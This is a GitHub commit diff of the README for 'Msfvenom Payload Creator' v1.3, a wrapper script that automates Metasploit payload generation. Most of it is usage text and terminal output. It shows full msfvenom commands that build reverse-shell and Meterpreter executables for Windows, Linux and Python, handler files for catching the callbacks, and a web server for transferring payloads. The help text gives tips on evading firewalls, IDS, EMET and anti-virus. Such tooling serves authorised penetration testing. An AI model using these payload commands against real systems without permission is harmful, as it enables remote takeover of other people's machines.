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v1.3 WAN + Bind/Reverse + tcp/http/https/find_port
Browse files Browse the repository at this point in the history
+ Add direction: Bind / Reverse
+ Add method: tcp / http / https/ find_port (& allports)
+ Add verbose to help screen (with URLs)
+ Detect & use external/WAN IP address
+ Display any errors from Metasploit/msfvenom when creating
+ File stats (md5/sha1/size) when using verbose
+ Output names include port & direction
+ Rather than limiting what payloads can be create - always create
  + This way when Metasploit is updated, the script isn't dated.
+ Redirect rather than using `-o` (for legacy metasploit versions - Fix for #1)
  • Loading branch information
g0tmi1k committed Jul 20, 2015
1 parent 3704861 commit 007db27
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@@ -1,6 +1,6 @@
A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).

![Msfvenom Payload Creator (MPC)](
![Msfvenom Payload Creator (MPC)](

- - -

Expand All @@ -9,15 +9,20 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (p
Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload.

**Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MPC itself)_.
The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands** and a **quick web server** etc).
The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands**, **batch payload production** and able to enter **any argument in any order** _(in various formats/patterns)_).

The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`).

* Can't remember your IP for a interface? Don't sweat it, just use the interface name: `eth0`.
* Don't know what your external IP is? MPC will discover it: `wan`.
* Want to generate one of each payload? No issue! Try: `loop`.
* Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)!

_Note: This will **not** try to bypass any anti-virus solutions._

## Install

* Designed for **Kali Linux 1.1.0a+** & **Metasploit v4.11+** _(nothing else has been tested)_.
* Designed for **Kali Linux v1.1.0a+** & **Metasploit v4.11+** _(nothing else has been tested)_.

curl -k -L "" > /usr/bin/mpc
Expand All @@ -28,17 +33,18 @@ mpc
## Help

``` bash
root@kali:~# mpc
[*] Msfvenom Payload Creator (MPC v1.2)
root@kali:~# mpc -h -v
[*] Msfvenom Payload Creator (MPC v1.3)

[i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<STAGED/STAGELESS>) (<CMD/MSF>) (<LOOP/BATCH>) (<VERBOSE>)
[i] Example: /usr/bin/mpc windows # Windows & manual IP.
[i] /usr/bin/mpc elf eth0 4444 # Linux, eth0's IP & manual port.
[i] /usr/bin/mpc stageless cmd py verbose # Python, stageless command prompt.
[i] /usr/bin/mpc loop eth1 # A payload for every type, using eth1's IP.
[i] /usr/bin/mpc msf batch eth1 # All possible Meterpreter payloads, using eth1's IP.
[i] /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
[i] /usr/bin/mpc help verbose # This help screen, with even more information.

[i] <TYPE>: (All reverse TCP payloads)
[i] <TYPE>:
[i] + ASP
[i] + ASPX
[i] + Bash [.sh]
Expand All @@ -57,34 +63,55 @@ root@kali:~# mpc

[i] Missing <PORT> will default to 443.

[i] <STAGED> splits the payload into parts, making it smaller but dependant on Metasploit.
[i] <STAGELESS> is the complete standalone payload. More 'stabe' than <STAGELESS>.
[i] Missing <STAGED/STAGELESS> will default to <STAGED>.
[i] Note: Metasploit doesn't (yet!) support <STAGED> for every <TYPE> format.
[i] <CMD> is a standard/native command prompt/terminal to interactive with.
[i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
[i] Note: Metasploit doesn't (yet!) support <MSF>/<CMD> for every <TYPE> format.
[i] Missing <CMD/MSF> will default to Meterpreter.

[i] <BATCH> will generate as many combinations as possible: <TYPE>, <STAGED> & <CMD/MSF>.
[i] Missing <CMD/MSF> will default to <MSF> where possible.
[i] Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
[i] <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
[i] <MSF> payloads are generally much larger than <CMD>, as it comes with more features.
[i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
[i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
[i] Missing <BIND/REVERSE> will default to <REVERSE>.
[i] <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.
[i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
[i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
[i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
[i] Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
[i] <STAGED> are 'better' in low-bandwidth/high-latency environments.
[i] <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
[i] More information:

[i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
[i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
[i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
[i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
[i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
[i] By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
[i] More information:

[i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
[i] <LOOP> will just create one of each <TYPE>.

[i] <VERBOSE> will display more information during the process.
[i] <VERBOSE> will display more information.

## Example \#1 (Windows, Fully Automated With IP)

root@kali:~# mpc windows
[*] Msfvenom Payload Creator (MPC v1.2)
[i] IP:
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter_reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter_reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST= LPORT=443 -o /root/windows-stageless-meterpreter-443.exe
[i] windows meterpreter created: '/root/windows-stageless-meterpreter-443.exe'
[i] MSF handler file: '/root/windows-stageless-meterpreter-443-exe.rc' (msfconsole -q -r /root/windows-stageless-meterpreter-443-exe.rc)
[*] Msfvenom Payload Creator (MPC v1.3)
[i] IP:
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST= LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe
[i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
[?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
[*] Done!
Expand All @@ -94,13 +121,13 @@ root@kali:~#

root@kali:~# ./mpc elf eth0 4444
[*] Msfvenom Payload Creator (MPC v1.2)
[i] IP:
[i] PORT: 4444
[i] TYPE: linux (linux/x86/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST= LPORT=4444 -o /root/linux-staged-meterpreter-4444.elf
[i] linux meterpreter created: '/root/linux-staged-meterpreter-4444.elf'
[i] MSF handler file: '/root/linux-staged-meterpreter-4444-elf.rc' (msfconsole -q -r /root/linux-staged-meterpreter-4444-elf.rc)
[*] Msfvenom Payload Creator (MPC v1.3)
[i] IP:
[i] PORT: 4444
[i] TYPE: linux (linux/x86/shell/reverse_tcp)
[i] CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST= LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
[i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
[i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc' (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
[?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
[*] Done!
Expand All @@ -109,36 +136,44 @@ root@kali:~#
## Example \#3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)

root@kali:~# bash stageless cmd py verbose
[*] Msfvenom Payload Creator (MPC v1.2)
root@kali:~# mpc stageless cmd py verbose
[*] Msfvenom Payload Creator (MPC v1.3)

[i] Use which interface/IP address?:
[i] 1.) eth0 -
[i] 1.) eth0 -
[i] 2.) eth1 -
[i] 3.) lo -
[?] Select 1-3, interface or IP address: 2

[i] IP:
[i] PORT: 443
[i] TYPE: python (python/shell_reverse_tcp)
[i] STAGE: stageless
[i] SHELL: shell
[i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST= LPORT=443 -o /root/
[i] python shell created: '/root/'
[i] MSF handler file: '/root/python-stageless-shell-443-py.rc' (msfconsole -q -r /root/python-stageless-shell-443-py.rc)
[i] 3.) tap0 -
[i] 4.) lo -
[i] 5.) wan - xx.xx.xx.xx
[?] Select 1-5, interface or IP address: 3

[i] IP:
[i] PORT: 443
[i] TYPE: python (python/shell_reverse_tcp)
[i] SHELL: shell
[i] DIRECTION: reverse
[i] STAGE: stageless
[i] METHOD: tcp
[i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST= LPORT=443 > /root/
[i] python shell created: '/root/'
[i] File: ASCII text, with very long lines, with no line terminators
[i] Size: 4.0K
[i] MD5: 53452eafafe21bff94e6c4621525165b
[i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9
[i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc' (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
[?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
[*] Done!
_Note: Removed WAN IP._


- - -

## To-Do List

* Display file stats (e.g. file, size, md5/sha1) _Commands are in, just commented out._
* Support different payloads (e.g. `reverse_http`/`reverse_https`, `bind`, `find_port` etc)
* Shellcode generation
* x64 payloads
* external IP/WAN
* _...IPv6 support?_
* IPv6 support
* Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_

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